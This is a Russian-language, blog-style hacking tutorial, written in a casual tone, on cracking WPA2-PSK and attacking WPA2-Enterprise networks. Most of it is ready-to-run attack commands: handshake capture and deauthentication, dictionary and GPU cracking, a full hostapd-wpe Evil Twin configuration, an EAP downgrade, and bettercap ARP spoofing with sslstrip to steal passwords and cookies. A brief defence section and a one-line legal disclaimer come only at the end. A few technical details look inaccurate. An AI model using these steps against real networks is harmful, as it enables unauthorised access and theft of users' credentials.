Воздушная тревога: ломаем Wi-Fi от WPA2 до корпоративных сетей с RADIUS
Окей, бро, садись поудобнее — сейчас разберем, как превратить любую Wi-Fi сеть в открытую книгу. От домашнего WPA2 до корпоративных сетей с RADIUS — все это взламывается, нужно только знать правильные инструменты и подходы. В этой статье я покажу тебе весь арсенал: от классического handshake-крэкинга до имперсонации точек доступа и атак на WPA2-Enterprise.
Почему Wi-Fi до сих пор уязвим
Wi-Fi безопасность за последние годы сильно прокачалась, но слабое звено осталось — люди. Даже WPA2, который считается надежным стандартом, падает, если пароль слабый или попадает в словарь. А корпоративные сети с RADIUS, хоть и выглядят круто, уязвимы к атакам типа Evil Twin и credential harvesting через поддельные точки доступа.
Основная проблема WPA/WPA2-PSK в том, что для взлома нужен всего лишь 4-way handshake и словарь паролей. Если пароль короткий или состоит из словарных слов, его можно подобрать за часы, а то и минуты. WPA2-Enterprise сложнее, но там можно поймать хэши через поддельную точку доступа и крэкнуть их оффлайн.
Взлом WPA2-PSK: классика жанра
Захват handshake
Первый шаг — это перевод беспроводного адаптера в режим мониторинга и захват 4-way handshake. Этот handshake содержит зашифрованные данные, которые можно использовать для брутфорса пароля.
Вот как это делается:
|
1 2 3 4 5 |
# Переводим адаптер в режим мониторинга airmon-ng start wlan0 # Запускаем airodump-ng для захвата пакетов airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w capture mon0 |
Где -c 6 — это канал целевой сети, --bssid — MAC адрес точки доступа, -w capture — префикс файла для сохранения, mon0 — интерфейс в режиме мониторинга.
Деаутентификация клиента
Чтобы не ждать, пока кто-то подключится к сети, можно принудительно отключить существующего клиента с помощью deauth-атаки. Клиент сразу же попытается переподключиться, и ты поймаешь handshake.
|
1 2 |
# Отправляем 1 деаутентификационный пакет клиенту aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 mon0 |
Где -0 1 — это количество деаутентификационных пакетов, -a — BSSID точки доступа, -c — MAC адрес клиента. После этого в airodump-ng появится надпись “WPA handshake” в верхнем правом углу.
Брутфорс пароля
Теперь, когда у тебя есть handshake, запускаешь aircrack-ng с словарем паролей:
|
1 |
aircrack-ng -w rockyou.txt -b 00:14:6C:7E:40:80 capture*.cap |
Где -w rockyou.txt — это путь к словарю паролей, -b — BSSID целевой сети, capture*.cap — файлы с захваченными пакетами. Скорость подбора зависит от мощности процессора — обычно это 50-300 ключей в секунду. Если пароль в словаре, aircrack-ng его найдет.
Ускорение с помощью GPU
Для серьезного брутфорса используй Hashcat с поддержкой GPU:
|
1 2 3 4 5 |
# Конвертируем .cap в формат для hashcat hccapx capture-01.cap output.hccapx # Запускаем hashcat с GPU hashcat -m 2500 output.hccapx rockyou.txt |
Hashcat может перебирать миллионы паролей в секунду на мощных видеокартах, что в сотни раз быстрее CPU.
Атаки на WPA2-Enterprise с RADIUS
Что такое WPA2-Enterprise
WPA2-Enterprise использует протокол 802.1X и RADIUS-сервер для аутентификации. Вместо общего пароля каждый пользователь вводит свои учетные данные (логин/пароль) через EAP (Extensible Authentication Protocol). Популярные методы EAP — это PEAP, EAP-TTLS, EAP-TLS.
Evil Twin атака с hostapd-wpe
Классическая атака на WPA2-Enterprise — это создание поддельной точки доступа (Evil Twin), которая выдает себя за легитимную сеть. Когда жертва подключается к поддельной точке, ее учетные данные перехватываются в виде хэшей.
Для этого используется инструмент hostapd-wpe (Wireless Pwnage Edition):
|
1 2 3 4 5 6 7 |
# Устанавливаем hostapd-wpe git clone https://github.com/OpenSecurityResearch/hostapd-wpe.git cd hostapd-wpe make # Настраиваем конфигурацию nano hostapd-wpe.conf |
В конфиге указываешь параметры целевой сети:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
interface=wlan0 driver=nl80211 ssid=CorporateNet channel=6 hw_mode=g wpa=3 wpa_key_mgmt=WPA-EAP wpa_pairwise=TKIP CCMP auth_algs=3 ieee8021x=1 eap_server=1 eap_user_file=hostapd-wpe.eap_user ca_cert=/etc/hostapd-wpe/certs/ca.pem server_cert=/etc/hostapd-wpe/certs/server.pem private_key=/etc/hostapd-wpe/certs/server.key private_key_passwd=whatever dh_file=/etc/hostapd-wpe/certs/dh |
Запускаешь поддельную точку доступа:
|
1 |
./hostapd-wpe hostapd-wpe.conf |
Когда жертва подключается, hostapd-wpe перехватывает NTLM-хэши или challenge-response пары, которые можно крэкнуть оффлайн.
Крэк перехваченных хэшей
После того, как hostapd-wpe поймал хэши, они сохраняются в файл hostapd-wpe.log. Извлекаешь их и крэкаешь через Hashcat или John the Ripper:
|
1 2 3 4 5 |
# Формат для PEAP/MSCHAPv2 hashcat -m 5500 hashes.txt rockyou.txt # Формат для EAP-TTLS john --wordlist=rockyou.txt hashes.txt |
Если пароль пользователя слабый, он будет вскрыт за считанные минуты.
Downgrade-атака на EAP
Некоторые клиенты поддерживают несколько методов EAP (например, PEAP и EAP-TTLS). Можно настроить поддельную точку доступа так, чтобы она предлагала более слабый метод, который легче атаковать. Например, EAP-MD5 можно крэкнуть быстрее, чем PEAP.
В конфиге hostapd-wpe добавляешь:
|
1 |
eap_user_file=hostapd-wpe.eap_user |
И в файле hostapd-wpe.eap_user указываешь:
|
1 |
* PEAP,MSCHAPV2,MD5,GTC |
Клиент попытается использовать самый слабый метод из списка, что облегчает атаку.
Сниффинг и Man-in-the-Middle
Перехват трафика после взлома
После того, как ты получил доступ к сети (через взлом WPA2 или подключение к поддельной точке), можно запустить сниффинг для перехвата незашифрованного трафика. Инструменты типа Wireshark или tcpdump позволяют анализировать пакеты в реальном времени.
|
1 2 3 4 5 |
# Запускаем tcpdump для захвата всего трафика tcpdump -i wlan0 -w traffic.pcap # Открываем в Wireshark для анализа wireshark traffic.pcap |
Фильтр eapol в Wireshark покажет только пакеты аутентификации, что полезно при анализе handshake.
MITM с использованием Bettercap
Для активных атак Man-in-the-Middle используй Bettercap:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 |
# Запускаем Bettercap sudo bettercap -iface wlan0 # В интерактивном режиме включаем ARP spoofing set arp.spoof.targets 192.168.1.10 arp.spoof on # Перехватываем HTTP credentials set http.proxy.sslstrip true http.proxy on # Запускаем сниффер net.sniff on |
Bettercap автоматически перехватывает пароли, cookies и другие чувствительные данные из незашифрованного трафика.
Защита от атак на Wi-Fi
Для WPA2-PSK
Используй длинные случайные пароли (минимум 20 символов). Пароль из 63 случайных символов практически невозможно взломать брутфорсом. Избегай словарных слов, имен, дат и простых комбинаций.
Регулярно меняй пароль и не используй один и тот же пароль для разных сетей. Отключи WPS (Wi-Fi Protected Setup), который имеет известные уязвимости.
Для WPA2-Enterprise
Используй сертификаты для взаимной аутентификации (EAP-TLS). Это защищает от поддельных точек доступа, так как клиент проверяет сертификат сервера. Настрой клиенты так, чтобы они проверяли сертификат RADIUS-сервера перед отправкой учетных данных.
Обучай пользователей не подключаться к незнакомым сетям с похожими именами. Используй систему обнаружения поддельных точек доступа (Rogue AP Detection) для мониторинга эфира.
Мониторинг и обнаружение
Разверни системы для мониторинга беспроводного трафика, такие как Kismet или WIDS (Wireless Intrusion Detection System). Эти инструменты обнаруживают deauth-атаки, поддельные точки доступа и другие аномалии в эфире.
Анализируй логи RADIUS-сервера на предмет неудачных попыток аутентификации и подозрительной активности. Настрой алерты на повторяющиеся ошибки аутентификации от одного пользователя, что может указывать на brute-force атаку.
Вот и все, братан — теперь ты знаешь, как ломать Wi-Fi от простого WPA2 до корпоративных сетей с RADIUS. Используй эти знания с умом, только для легальных пентестов и с разрешения владельца сети. Wi-Fi безопасность — это не просто сильный пароль, это комплекс мер от шифрования до мониторинга.
На этом все. Всем хорошего дня!